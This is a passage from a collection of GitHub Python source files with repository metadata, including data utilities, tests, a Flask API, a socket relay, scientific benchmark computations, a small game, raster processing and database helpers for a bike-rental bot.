[{\"content\":k,\"entity_list\":v} for k , v in data_dict.items()]\n    if mode==1:\n        data = [{\"uid\":k, \"content\":v,\"entity_list\": []} for k , v in data_dict.items()]\n    return data\n\n\n\ndef get_cls_data_by_txt(file_path,mode):\n    data = []\n    if mode == 0:\n        train_df = pd.read_csv(file_path, sep='\\t', header=None,\n                               names=['id', 'content', 'type', 'entity'])\n        neg_df = train_df[train_df.type.isna()]\n        pos_df = train_df[~train_df.type.isna()]\n        new_train_df = pos_df.groupby(by=['content']).type.aggregate(set).reset_index()\n        for idx, row in new_train_df.iterrows():\n            uid = idx\n            content = row['content']\n            types = list(row['type'])\n            data.append((uid, content, types))\n        # for idx, row in neg_df.iterrows():\n        #     # 加上负例\n        #     uid = idx\n        #     content = row['content']\n        #     types = None\n        #     data.append((uid, 
content, types))\n # continue\n elif mode==1:\n test_df = pd.read_csv(file_path,sep = \"\\t\",header =None,names = ['uid','content'])\n print(test_df.shape)\n for _, row in test_df.iterrows():\n na_check = ~row.isna()\n id = row[0]\n content = row[1] if na_check[1] else \"\"\n type = None\n data.append((id,content,type))\n return data\n\n\ndef _get_entity_list(df,content):\n entity_list = list(df[df.content==content].entity)\n return entity_list\n\nclass MyBertTokenizer():\n\n @classmethod\n def from_pretrained(cls, path,*args,**kwargs):\n obj = cls()\n obj.bert_tokenizer = BertTokenizer.from_pretrained(path,*args,**kwargs)\n return obj\n\n def tokenize(self,sentence):\n tokens = []\n for c in sentence:\n if c in self.bert_tokenizer.vocab:\n tokens.append(c)\n else:\n tokens.append(\"[UNK]\")\n return tokens\n\n def convert_tokens_to_ids(self,tokens):\n return self.bert_tokenizer.convert_tokens_to_ids(tokens)\n\n def convert_ids_to_tokens(self,ids):\n return self.bert_tokenizer.convert_ids_to_tokens(ids)\n\n\n\n\n\n","repo_name":"South7X/CCKS2020","sub_path":"CCKS_multi-label/data_utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4097,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"94"} +{"seq_id":"42492504052","text":"import pytest\n\nimport os\nimport news_scraping.output as store\n\n\n@pytest.fixture\ndef valid_output_names():\n \"\"\"valid output names\"\"\"\n return ['some_name', '_', 'some_simple_title',\n 'max_len_title_available_is_50_chars_so_i_need_more']\n\n\n@pytest.fixture\ndef output_names():\n \"\"\"valid output names. list of tuples observed name, expected after transformation\"\"\"\n return [('some_symbols_fi:l*ep\"a?t>h|<', 'some_symbols_filepath'),\n ('some spaces ', 'some_spaces'),\n ('max_len_title_available_is_50_chars_so_i_need_more_a',\n 'max_len_title_available_is_50_chars_so_i_need_more')]\n\n\n@pytest.fixture\ndef valid_output_dirs():\n \"\"\"Get valid output dir names\"\"\"\n valid_dirs = [os.path.dirname(os.path.realpath(__file__))]\n return valid_dirs\n\n\n@pytest.fixture\ndef valid_identifiers():\n \"\"\"Get valid identifiers for output path\"\"\"\n return [1, \"1\"]\n\n\ndef test_format_output_name_valid(valid_output_dirs, valid_identifiers, valid_output_names):\n \"\"\"Test func format output name when it receives valid path\"\"\"\n for valid_dir in valid_output_dirs:\n for valid_identifier in valid_identifiers:\n for valid_name in valid_output_names:\n # Since it is a valid output path, it should return the same as passed\n expected_path = os.path.join(valid_dir, f\"{valid_identifier}_{valid_name}\")\n observed_path = store.format_output_name(valid_dir, valid_name, valid_identifier)\n assert expected_path == observed_path\n\n\ndef test_format_output_name_invalid_output_name(valid_output_dirs, valid_identifiers, output_names):\n \"\"\"Test function when it receives invalid output_names\"\"\"\n for valid_dir in valid_output_dirs:\n for valid_identifier in valid_identifiers:\n for invalid_name, valid_name in output_names:\n # Since it is a valid output path, it should return the same as passed\n expected_path = os.path.join(valid_dir, f\"{valid_identifier}_{valid_name}\")\n observed_path = store.format_output_name(valid_dir, invalid_name, valid_identifier)\n assert expected_path == 
observed_path\n","repo_name":"AnomanderRK/newsscraping","sub_path":"tests/test_store.py","file_name":"test_store.py","file_ext":"py","file_size_in_byte":2190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"8756423329","text":"\n\nfrom flask import Blueprint, abort, jsonify\n\nfrom .. import models, utils\n\n\napi = Blueprint('api', __name__)\n\n\n@api.route('/filelist/<int:torrent_id>')\ndef filelist(torrent_id):\n    torrent = models.Torrent.query.filter_by(id=torrent_id).first()\n    if torrent is None:\n        return abort(404)\n    files = []\n    for file in torrent.files:\n        files.append(dict(\n            path=file.path,\n            size=file.size,\n            pretty_size=utils.pretty_size(file.size),\n        ))\n    return jsonify(\n        id=torrent.id,\n        files=files\n    )\n","repo_name":"ipatrol/pynyaa","sub_path":"pynyaa/views/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"23700516530","text":"import socket\nimport logging\nfrom threading import Thread\nfrom time import sleep\n\nRETRY_THRESHOLD = 10  # Number of retries before closing a timed-out request\n\n\nclass SSLThread(Thread):\n    def __init__(self, in_socket, out_socket, *args, **kwargs):\n        self.in_socket = in_socket\n        self.out_socket = out_socket\n        self.out_socket.settimeout(2)\n        super(*args, **kwargs)\n        Thread.__init__(self)\n\n    def run(self):\n        retry_count = 0\n        while True:\n            try:\n                data_in = self.out_socket.recv(512)\n                retry_count = 0\n            except socket.error as e:\n                err = e.args[0]\n                if err == 'timed out' and retry_count < RETRY_THRESHOLD:\n                    sleep(1)\n                    retry_count += 1\n                    continue\n                else:\n                    logging.info(\"ssl timeout, closing ({})\".format(self))\n                    self.in_socket.close()\n                    self.out_socket.close()\n                    return\n            else:\n                if len(data_in) == 0:\n                    logging.info(\"Connection terminated\")\n                    self.in_socket.close()\n                    self.out_socket.close()\n                    return\n                else:\n                    try:\n                        self.in_socket.send(data_in)\n                    except OSError:\n                        logging.info(\"Connection terminated\")\n                        self.in_socket.close()\n                        self.out_socket.close()\n                        return\n","repo_name":"rkouere/ssh_secret","sub_path":"ssh_tunnel/proxy/ssl_thread.py","file_name":"ssl_thread.py","file_ext":"py","file_size_in_byte":1646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"21930552941","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Mar 12 11:17:06 2022\n\n@author: bennett\n\"\"\"\n\nimport numpy as np\nimport math as math\nimport scipy.integrate as integrate \n# from numba import njit, cfunc, jit\nimport matplotlib.pyplot as plt\nfrom timeit import default_timer as timer\nimport h5py\nfrom .benchmark_functions import F, F1, F_gaussian_source, uncollided_square_source, pyF, get_intervals\nfrom pathlib import Path\n\n# @cfunc(\"complex128(float64, float64)\")\n# @jit\n\n \ndef opts0(*args, **kwargs):\n    return {'limit':1000000}\n    \ndef opts1(*args, **kwargs):\n    return {'limit':1000000}\n    \ndef opts2(*args, **kwargs):\n    return {'limit':1000000}\n\ndef do_ganapol(x, tfinal, x0):\n    integral_1 = pyF(0.0, 0.0, tfinal, x)\n    integral_2 = integrate.nquad(F1, [[0, math.pi]], args = (0.0, 0.0, x, tfinal, 0), opts = [opts0])[0]\n    return integral_1 + integral_2\n\ndef do_square_ic(x, tfinal, x0):\n    integral_1 = integrate.nquad(F, [[-x0, x0]], args = ([0.0, tfinal, x, 0]), opts = [opts0])[0]\n    integral_2 = integrate.nquad(F1, [[0, math.pi], [-x0, x0]], args = (0.0, x, tfinal, 0), 
opts = [opts0, opts0, opts0])[0]\n    return integral_1 + integral_2\n\ndef do_square_source(x, tfinal, x0):\n    collided_solution = integrate.nquad(F1, [[0, math.pi], [-x0, x0], [0,tfinal]], args = (x, tfinal, 0), opts = [opts0, opts1, opts2])[0]\n    uncollided_solution = uncollided_square_source(x, tfinal, x0, tfinal)\n\n    # intervals = get_intervals(x, tfinal, x0, tfinal)\n    # a = intervals[0]\n    # b = intervals[1]\n    # c = intervals[2]\n    # d = intervals[3]\n    \n    # if a == tfinal:\n    #     print(\"a = t\")\n    # if b == tfinal:\n    #     print(\"b = t\")\n    # if c == tfinal:\n    #     print(\"c = t\")\n    # if d == tfinal:\n    #     print(\"d = t\")\n    \n    # collided_solution += integrate.nquad(F1, [[0, math.pi], [-x0, x0], [a, b]], args = (x, tfinal, 0), opts = [opts0, opts1, opts2])[0]\n    # collided_solution += integrate.nquad(F1_c2, [[0, math.pi], [-x0, x0], [b, c]], args = (x, tfinal, 0), opts = [opts0, opts1, opts2])[0]\n    # collided_solution += integrate.nquad(F1_c3, [[0, math.pi], [-x0, x0], [c, d]], args = (x, tfinal, 0), opts = [opts0, opts1, opts2])[0]\n    \n    return uncollided_solution + collided_solution\n\ndef do_gaussian_ic(x, tfinal):\n    integral_1 = integrate.nquad(F, [[-np.inf, np.inf]], args = ([0.0, tfinal, x, 1]), opts = [opts0])[0]\n    integral_2 = integrate.nquad(F1, [[0, math.pi], [-np.inf, np.inf]], args = (0.0, x, tfinal, 1), opts = [opts0, opts1])[0]\n    return integral_1 + integral_2\n    \n\ndef do_gaussian_source(x, tfinal):\n    sqrtpi = math.sqrt(math.pi)\n    # integral_1 = integrate.nquad(F, [[-np.inf, np.inf], [0, tfinal]], args = (tfinal, x, 1), opts = [opts0, opts1, opts2])[0]\n    integral_1 = integrate.nquad(F_gaussian_source, [[0, tfinal]], args = (tfinal, x), opts = [opts0])[0]\n\n    integral_2 = integrate.nquad(F1, [[0, math.pi], [-np.inf, np.inf], [0, tfinal]], args = (x, tfinal, 1), opts = [opts0, opts1, opts2])[0]\n    return sqrtpi/8 * integral_1 + integral_2\n\n\n\n    \ndef make_benchmark_file_structure():\n    data_folder = Path(\"moving_mesh_transport/benchmarks\")\n    bench_file_path = data_folder / 'benchmarks.hdf5'\n    source_name_list = ['plane_IC', 'square_IC', 'square_source', 'gaussian_IC', 'gaussian_source']\n    \n    f = h5py.File(bench_file_path, \"a\")\n    \n    for source_name in source_name_list:\n        if f.__contains__(source_name):\n            del f[source_name]\n        f.create_group(source_name)\n    \n    f.close()\n\ndef write_to_file(xs, phi, tfinal, source_name, npnts):\n    data_folder = Path(\"moving_mesh_transport/benchmarks\")\n    bench_file_path = data_folder / 'benchmarks.hdf5'\n    \n    with h5py.File(bench_file_path,'r+') as f:\n        if f.__contains__(source_name + f'/t = {tfinal}'):\n            del f[source_name + f'/t = {tfinal}'] \n        f.create_dataset(source_name + f'/t = {tfinal}', (2, npnts), dtype = \"f\", data=(xs, phi))\n    f.close()\n    \n\ndef make_benchmarks(tfinal, x0, npnts = [20000, 2000, 500, 2000, 500]):\n    print(\"t = \", tfinal)\n    xs1 = np.linspace(0, tfinal, npnts[0])\n    xs2 = np.linspace(0, tfinal + x0, npnts[1])\n    xs3 = np.linspace(0, tfinal + x0, npnts[2])\n    xs4 = np.linspace(0, tfinal + 5, npnts[3])\n    xs5 = np.linspace(0, tfinal + 5, npnts[4])\n    # xs3 = np.array([0.176,1.5])\n    times = np.zeros(5)\n    phi_pl = xs1*0\n    phi_sq = xs2*0\n    phi_sqs = xs3*0\n    phi_gss = xs4*0\n    phi_gss_s = xs5*0\n    \n    start = timer()\n    for i in range(npnts[0]):\n        phi_pl[i] = do_ganapol(xs1[i], tfinal, 0.0)\n    times[0] = timer() - start\n    start = timer()\n    print(\"plane finished\")\n    for j in range(npnts[1]):\n        phi_sq[j] = do_square_ic(xs2[j], tfinal, x0)\n    times[1] = timer() - start\n    start = timer()\n    print(\"square IC finished\")\n    for k in range(npnts[2]):\n        
phi_sqs[k] = do_square_source(xs3[k], tfinal, x0)\n times[2] = timer() - start\n start = timer()\n print(\"square source finished\")\n for h in range(npnts[3]):\n phi_gss[h] = do_gaussian_ic(xs4[h], tfinal)\n times[3] = timer() - start\n start = timer()\n print(\"Gauss IC finished\")\n for l in range(npnts[4]):\n phi_gss_s[l] = do_gaussian_source(xs5[l], tfinal)\n times[4] = timer() - start\n print(\"Gauss source finished\")\n \n \n # plt.plot(xs1, phi_pl, \"-.\",label = \"plane\")\n # plt.plot(xs2, phi_sq, \"--\", label = \"square IC\")\n # plt.plot(xs3, phi_sqs, \":\", label = \"square source\")\n # plt.plot(xs4, phi_gss, \"--*\", label = \"Gaussian IC\")\n # plt.plot(xs5, phi_gss_s, \"--x\", label = \"Gaussian source\")\n # plt.xlabel(\"x\")\n # plt.ylabel(\"scalar flux\")\n # plt.xlim(0,tfinal + x0 + 1)\n # plt.legend()\n \n \n print(\"- - - - - - - - -\")\n print(\"time elapsed\")\n print(times)\n print(\"- - - - - - - - -\")\n print(\"time per evaluation point\")\n print(times/np.array(npnts))\n print(\"- - - - - - - - -\")\n\n \n\n write_to_file(xs1, phi_pl, tfinal, 'plane_IC', npnts[0])\n write_to_file(xs2, phi_sq, tfinal, 'square_IC', npnts[1])\n write_to_file(xs3, phi_sqs, tfinal, 'square_source', npnts[2])\n write_to_file(xs4, phi_gss, tfinal, 'gaussian_IC', npnts[3])\n write_to_file(xs5, phi_gss_s, tfinal, 'gaussian_source', npnts[4])\n\ndef make_square_source(tfinal, x0, npnts = [100]):\n print(\"t = \", tfinal)\n xs1 = np.linspace(0, tfinal + x0, npnts[0])\n # xs3 = np.array([0.176,1.5])\n times = np.zeros(1)\n phi_sqs = xs1*0\n\n start = timer()\n for k in range(npnts[0]):\n phi_sqs[k] = do_square_source(xs1[k], tfinal, x0)\n times[0] = timer() - start\n print(\"square source finished\")\n \n plt.figure(-1)\n # plt.plot(xs1, phi_pl, \"-.\",label = \"plane\")\n # plt.plot(xs2, phi_sq, \"--\", label = \"square IC\")\n plt.plot(xs1, phi_sqs, \"-\", label = \"square source\")\n plt.show()\n # plt.plot(xs4, phi_gss, \"--*\", label = \"Gaussian IC\")\n # plt.plot(xs5, phi_gss_s, \"--x\", label = \"Gaussian source\")\n # plt.xlabel(\"x\")\n # plt.ylabel(\"scalar flux\")\n # plt.xlim(0,tfinal + x0 + 1)\n # plt.legend()\n \n \n print(\"- - - - - - - - -\")\n print(\"time elapsed\")\n print(times)\n print(\"- - - - - - - - -\")\n print(\"time per evaluation point\")\n print(times/np.array(npnts))\n print(\"- - - - - - - - -\")\n write_to_file(xs1, phi_sqs, tfinal, 'square_source', npnts[0])\n \n\ndef make_all():\n x0 = 0.5\n make_benchmarks(1, x0)\n make_benchmarks(5, x0)\n make_benchmarks(10, x0)\n","repo_name":"wbennett39/moving_mesh_radiative_transfer","sub_path":"moving_mesh_transport/benchmarks/old_drafts/make_benchmarks.py","file_name":"make_benchmarks.py","file_ext":"py","file_size_in_byte":7591,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"94"} +{"seq_id":"31359696958","text":"import time\nfrom turtle import Screen\nfrom player import Player\nfrom car_manager import CarManager\nfrom scoreboard import Scoreboard\n\nscreen = Screen()\nscreen.setup(width=600, height=600)\nscreen.tracer(0)\n\nlevel=Scoreboard()\nturt=Player()\nscreen.listen()\nscreen.onkey(fun=turt.move ,key=\"Up\")\n\ncar=CarManager()\n\ngame_is_on = True\nwhile game_is_on:\n time.sleep(0.1)\n screen.update()\n car.create_car()\n car.move_car()\n\n position_turt=(turt.xcor(), turt.ycor())\n if car.smash(pos=position_turt) == 1 :\n level.game_over()\n game_is_on = False\n \n if turt.ycor() > 260:\n turt.starting_pos()\n level.update_score()\n 
car.up_speed()\n\n\nscreen.exitonclick()\n","repo_name":"oguzbulbul/Python-Projects","sub_path":"day23-Turtle_Crossing_Game/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"94"} +{"seq_id":"39090845728","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jun 17 20:48:01 2018\n\n@author: anind\n\"\"\"\nfrom spi import SPI\nimport numpy as np\nimport os, random\nfrom PIL import Image\nimport time\nimport gdal\nimport osr\nfrom math import isnan\n\n\n\nspi = SPI()\n \nspi.set_rolling_window_params(\n span=1, window_type=None, center=True)\n\n # Set distribution parameters\nspi.set_distribution_params(dist_type='gam')\n\n\ndef use_spi(arr: np.array) -> np.array:\n\n \n data = spi.calculate(arr, starting_month=1)\n data = data.flatten() \n #Calculate and return 1d array\n return data\n\ndef tiffolder_to_3darr(directory_name) -> np.array:\n '''Returns a 3d array from a directory containing tiff images of\n equal shape.\n For ex: if each image is of shape (460,640) and there are 200 images,\n the returned array will have shape (460,640,200)\n '''\n start = time.time()\n sizeget = ''\n while sizeget[-3:] != 'tif':\n \n sizeget = random.choice(os.listdir(directory_name))\n location = directory_name + \"\\\\\" + sizeget\n im = Image.open(location)\n arr = np.array(im)\n \n y = np.size(arr,1)\n x = np.size(arr,0)\n #getting size of an image (it should match the other images)\n mainarr = np.zeros((x,y,0))\n for file in os.listdir(directory_name):\n #appending arrays of tif file to 3darray\n if file[-3:] == 'tif':\n location = directory_name + \"\\\\\" + file\n im = Image.open(location)\n arr = np.array(im) \n mainarr = np.dstack((mainarr,arr))\n print('added')\n end = time.time()\n print(end - start)\n return mainarr \n\ndef gettypefilelist(directory_name, filetype) -> list:\n lis = []\n for file in os.listdir(directory_name):\n if file.endswith(filetype):\n lis.append(file)\n return lis\n\ndef spi3d(arr: np.array) -> np.array:\n# newarr = arr\n st = time.time()\n for x in range(len(arr)):\n for y in range(len(arr[x])):\n \n cell = arr[x][y]\n lis = []\n \n mlist = []\n for z in range(len(cell)):\n if cell[z] > -0.00000000000000001:\n #print(cell[z]) \n mlist.append(cell[z])\n \n lis.append(z)\n else:\n arr[x][y][z] = np.nan\n# \n# lis = [i for i in range(len(arr[x][y])) if arr[x][y][i] >= 0.00000000001]\n# mlist = [i for i in arr[x][y] if i >= 0.00000000001]\n \n \n modc = np.array(mlist)\n try:\n modc = use_spi(modc) \n \n for k in range(len(modc)):\n pos = lis[k]\n arr[x][y][pos] = modc[k]\n now = time.time()\n print(str(x)+' , '+str(y) + ' : ' + str(now-st))\n except:\n arr[x][y][:] = np.nan\n now = time.time()\n print(str(x)+' , '+str(y) + ' : ' + str(now-st)+\" nan\")\n \n \n# newarr [x][y] = cell \n en = time.time()\n print(en-st)\n \n arr = np.swapaxes(arr,2,0)\n arr = np.swapaxes(arr,1,2)\n \n return arr\n\n\ndef output(loc: str, arr: np.array, l: list, store: str):\n '''loc : location of rainfall files\n arr: 3d array containing spi values\n l: list containing names of files in the same order\n store: store location of spi files\n '''\n sizeget = l[0]\n \n sample = loc + '\\\\' + sizeget\n \n inDs = gdal.Open(sample)\n \n band = inDs.GetRasterBand(1)\n NDV = band.GetNoDataValue()\n \n wkt = inDs.GetProjection()\n \n # setting spatial reference of output raster \n srs = osr.SpatialReference()\n srs.ImportFromWkt(wkt)\n \n gt = inDs.GetGeoTransform()\n \n inDs = None\n \n 
[rows,cols] = arr[0].shape\n \n driver = gdal.GetDriverByName(\"GTiff\")\n \n \n \n for i in range(len(arr)):\n raster = np.zeros((rows,cols), dtype=np.float32)\n a = arr[i]\n raster = raster + a\n storeloc = store + '\\\\' + l[i]\n dst_ds = driver.Create(storeloc, \n cols, \n rows, \n 1, \n gdal.GDT_Float32)\n \n\n dst_ds.SetProjection( srs.ExportToWkt() )\n \n \n dst_ds.SetGeoTransform(gt)\n \n dst_ds.GetRasterBand(1).SetNoDataValue(NDV)\n \n \n \n \n dst_ds.GetRasterBand(1).WriteArray(raster)\n \n #dst_ds.GetRasterBand(1).WriteArray( narr ) \n \n dst_ds.FlushCache()\n dst_ds = None\n \n print(l[i])\n \n \n \n\n\n\n","repo_name":"anind99/SPI-CALC","sub_path":"spi_calculation.py","file_name":"spi_calculation.py","file_ext":"py","file_size_in_byte":4800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"34598276855","text":"def pattern(word):\n patn = ''\n for letter in word:\n if letter in vowels:\n patn += '*'\n else:\n patn += '-'\n return patn\n\n\nvowels = 'уеыаоэяиюэ'\nword_pattern = input()\npat = pattern(word_pattern)\nvowel_amount = pat.count('*')\nn = int(input())\nfor i in range(n):\n word = input()\n pat_new = pattern(word)\n if pat_new.count('*') == vowel_amount:\n flag = True\n for j in range(len(pat)):\n if pat[j] == '*' and pat_new[j] != '*':\n flag = False\n break\n if flag:\n print(word)\n","repo_name":"grigvlwork/py_prog","sub_path":"attest/rhymes.py","file_name":"rhymes.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"8509841786","text":"import os\nfrom typing import Optional, List\nfrom dataclasses import dataclass, field\nfrom sentence_transformers import models, SentenceTransformer\nfrom transformers import HfArgumentParser\n\n\ndef convert_ours_ckpt_to_sentence_transformer(src_dir, dest_dir, pooling_method: List[str] = ['cls'], dense_metric: str=\"cos\"):\n assert os.path.exists(src_dir), f\"Make sure the encoder path {src_dir} is valid on disk!\"\n assert \"decoder\" not in pooling_method, f\"Pooling method 'decode' cannot be saved as sentence_transformers because it uses the decoder stack to produce sentence embedding.\"\n if dest_dir is None:\n dest_dir = src_dir\n\n print(f\"loading model from {src_dir} and saving the sentence_transformer model at {dest_dir}...\")\n\n word_embedding_model = models.Transformer(src_dir)\n modules = [word_embedding_model]\n ndim = word_embedding_model.get_word_embedding_dimension()\n\n if \"cls\" in pooling_method:\n pooling_model = models.Pooling(ndim, pooling_mode=\"cls\")\n pooling_method.remove(\"cls\")\n elif \"mean\" in pooling_method:\n pooling_model = models.Pooling(ndim, pooling_mode=\"mean\")\n pooling_method.remove(\"mean\")\n else:\n raise NotImplementedError(f\"Fail to find cls or mean in pooling_method {pooling_method}!\")\n \n modules.append(pooling_model)\n\n if \"dense\" in pooling_method:\n modules.append(models.Dense(ndim, ndim, bias=False))\n pooling_method.remove(\"dense\")\n \n assert len(pooling_method) == 0, f\"Found unused pooling_method {pooling_method}!\"\n\n if dense_metric == \"cos\":\n normalize_layer = models.Normalize()\n modules.append(normalize_layer)\n\n model = SentenceTransformer(modules=modules, device='cpu')\n model.save(dest_dir)\n\n\n@dataclass\nclass Args:\n encoder: Optional[str] = field(\n default=None,\n metadata={'help': 'Path to the encoder model.'}\n )\n output_dir: Optional[str] = field(\n default=None,\n 
metadata={'help': 'Path to the output sentence_transformer model.'}\n )\n pooling_method: List[str] = field(\n default_factory=lambda: [\"cls\"],\n metadata={'help': 'Pooling methods to aggregate token embeddings for a sequence embedding. {cls, mean, dense, decoder}'}\n )\n dense_metric: str = field(\n default=\"cos\",\n metadata={'help': 'What type of metric for dense retrieval? ip, l2, or cos.'}\n )\n model_cache_dir: Optional[str] = field(\n default=None,\n metadata={'help': 'Cache folder for huggingface transformers.'}\n )\n\n def __post_init__(self):\n convert_ours_ckpt_to_sentence_transformer(self.encoder, self.output_dir, self.pooling_method, self.dense_metric)\n\nif __name__ == \"__main__\":\n parser = HfArgumentParser([Args])\n args, = parser.parse_args_into_dataclasses()\n\n","repo_name":"FlagOpen/FlagEmbedding","sub_path":"FlagEmbedding/llm_embedder/scripts/ours2st.py","file_name":"ours2st.py","file_ext":"py","file_size_in_byte":2814,"program_lang":"python","lang":"en","doc_type":"code","stars":1830,"dataset":"github-code","pt":"94"} +{"seq_id":"38464592211","text":"\ndef isfloat(value):\n try:\n float(value)\n return True\n except:\n return False\n\n\ndef isint(value):\n try:\n int(value)\n return True\n except:\n return False\n\n\nCONVERTERS = {'IntType': lambda x: int(x),\n 'FloatType': lambda x: float(x),\n 'StringType': lambda x: x}\n\n\ndef pick_type(types):\n ''' if there is only one type found\n in a column, then use that. if multiple\n types are found, default back to string.\n '''\n type_set = set(types)\n if len(type_set) == 1:\n return list(type_set)[0]\n elif set(['IntType', 'FloatType']) == type_set:\n # if there is a mix of floats and ints, then the column is floats.\n return 'FloatType'\n else:\n return 'StringType'\n\n\ndef get_column_types(content):\n ''' Figure out what type of content is in each column\n of a csv-like input. This is a simple brute force method that\n attempts to convert the strings of the content into floats and ints.\n if the conversion is successful for all rows tested,\n that type is considered the type of the column.\n '''\n\n # number of rows to check for content\n test_count = min(len(content), 5)\n\n # number of columns\n col_count = len(content[0])\n\n all_types = [[] for i in range(col_count)]\n\n for r_ind in range(test_count):\n for col_ind, col in enumerate(content[r_ind]):\n if isint(col):\n all_types[col_ind].append('IntType')\n elif isfloat(col):\n all_types[col_ind].append('FloatType')\n else:\n all_types[col_ind].append('StringType')\n\n # find if conversions are consistent across rows\n column_types = [pick_type(types) for types in all_types]\n return column_types\n\n\ndef coerce_types(content):\n '''\n Convert types in csv-like content.\n The idea is that when translating to and\n from csv, everything is converted to strings. 
So, we need to undo that\n    conversion for things like counts.\n    '''\n    if len(content) == 0:\n        return content\n\n    column_types = get_column_types(content)\n\n    coerced_content = []\n    for row in content:\n        c_row = []\n        for col_ind, col in enumerate(row):\n            try:\n                col = CONVERTERS[column_types[col_ind]](col)\n            except ValueError:\n                pass\n            c_row.append(col)\n        coerced_content.append(c_row)\n    return coerced_content\n","repo_name":"learntextvis/textkit","sub_path":"textkit/coerce.py","file_name":"coerce.py","file_ext":"py","file_size_in_byte":2462,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"94"} +{"seq_id":"26407347780","text":"from database.postgresql import cur, db\n\n\nasync def insert_oil_service_table(bike_id):\n    cur.execute(f\"INSERT INTO oil_services (bike_id, last_oil_change_mileage) \"\n                f\"SELECT id, millage FROM bike WHERE id=%s\", (bike_id,))\n    db.commit()\n\n\nasync def take_data_from_oil_service(bike_id):\n    cur.execute(\"SELECT oil_need_change, last_oil_change_mileage FROM oil_services WHERE bike_id=%s\", (bike_id,))\n    result = cur.fetchone()\n    return result\n\n\nasync def update_oil_need_change_data(bike_id):\n    cur.execute(\"UPDATE oil_services SET oil_need_change = true WHERE bike_id = %s AND oil_need_change = false\",\n                (bike_id,))\n    db.commit()\n\n\nasync def update_oil_need_change_data_false(bike_id):\n    cur.execute(\"UPDATE oil_services SET oil_need_change = false WHERE bike_id = %s AND oil_need_change = true\",\n                (bike_id,))\n    db.commit()\n\n\nasync def update_bike_service_status_exist(bike_id):\n    cur.execute(\"SELECT * FROM service WHERE bike_id = %s\",\n                (bike_id,))\n    result = cur.fetchone()\n    return result\n\n\nasync def update_bike_service_status(bike_id):\n    exist = await update_bike_service_status_exist(bike_id)\n    if not exist:\n        cur.execute(\"INSERT INTO service (bike_id, status) VALUES (%s, %s) RETURNING id\", (bike_id, 'oil change'))\n        result = cur.fetchone()[0]\n        db.commit()\n        return result\n    else:\n        cur.execute(\"UPDATE service SET status = 'oil change' WHERE bike_id = %s RETURNING id\",\n                    (bike_id,))\n        result = cur.fetchone()[0]\n        db.commit()\n        return result\n\n\nasync def get_open_service():\n    cur.execute(\"SELECT * FROM service WHERE open=true\")\n    result = cur.fetchall()\n    return result\n\n\nasync def db_create_new_task(bike_id, task):\n    cur.execute(\"INSERT INTO service (bike_id, status) VALUES (%s, %s) RETURNING id\", (bike_id, task))\n    result = cur.fetchone()[0]\n    db.commit()\n    return result\n\n\nasync def get_bike_id(service_id):\n    cur.execute(\"SELECT bike_id FROM service WHERE id=%s\", (service_id,))\n    result = cur.fetchone()\n    return result\n\n\nasync def delete_service(service_id):\n    cur.execute(\"DELETE FROM service WHERE id=%s\", (service_id,))\n    db.commit()\n\n\nasync def get_client_damage_service():\n    cur.execute(\"SELECT * FROM service WHERE status='client damage'\")\n    result = cur.fetchall()\n    return result\n\n\nasync def get_not_opened_service():\n    cur.execute(\"SELECT * FROM service WHERE open=false\")\n    result = cur.fetchall()\n    return result\n\n\nasync def update_open_task(start_date,service_id):\n    cur.execute(\"UPDATE service SET open=true, start_date=%s WHERE id=%s\", (start_date,service_id,))\n    db.commit()\n\n\nasync def get_service_for_bike(bike_id):\n    cur.execute(\"SELECT id, start_date, status FROM service WHERE open=true AND bike_id=%s\",(bike_id,))\n    result = cur.fetchall()\n    return 
result","repo_name":"west3n/bikerent","sub_path":"database/db_service.py","file_name":"db_service.py","file_ext":"py","file_size_in_byte":2884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"24476820854","text":"import xarray as xr\nimport pandas as pd\nfrom tqdm import tqdm\nimport sys\nimport os\nimport time\n\n'''\nAuthor: Cameron Bracken 10-27-2023\n\nCreate VIC domain and param files for each grid point, and organize the files by HUC2\n'''\n\n\ndef process(output_dir):\n\n print(f'Processing domain and params')\n start_time = time.time()\n\n domain = xr.load_dataset('/rcfs/projects/godeeep/VIC/params/namerica_domain.nc')\n params = xr.load_dataset('/rcfs/projects/godeeep/VIC/params/namerica_params.nc')\n grid_ids = pd.read_csv('../data/grid_ids_conus.csv')\n runtime = round((time.time() - start_time)/60, 2)\n print(f\"Loading the datasets took {runtime} minutes\")\n\n # for i, cell in tqdm(grid_ids.iterrows(), total=grid_ids.shape[0]):\n for n, cell in tqdm(grid_ids.iterrows(), total=grid_ids.shape[0]):\n\n i = int(cell.id)\n huc2_code = int(cell.huc2)\n lat = cell.lat\n lon = cell.lon\n\n point_domain = domain.sel(lat=slice(lat, lat), lon=slice(lon, lon))\n point_params = params.sel(lat=slice(lat, lat), lon=slice(lon, lon))\n\n mask = point_domain.mask\n # make sure the mask is set properly\n # mask[0] = 1\n\n root_fract = point_params.root_fract\n\n for k in range(len(root_fract.veg_class)):\n # root fraction was throwing errors so renormalize\n root_fract[k, :] = root_fract[k, :]/sum(root_fract[k, :])\n\n # point_domain['mask'] = mask\n point_params['mask'] = mask\n point_params['run_cell'] = mask\n point_params['root_fract'] = root_fract\n\n # make a subdirectory for each grid point\n point_dir = f'{output_dir}/{huc2_code:02}/{i:07}_{lon:0.5f}_{lat:0.5f}'\n os.makedirs(point_dir, exist_ok=True)\n domain_fn = 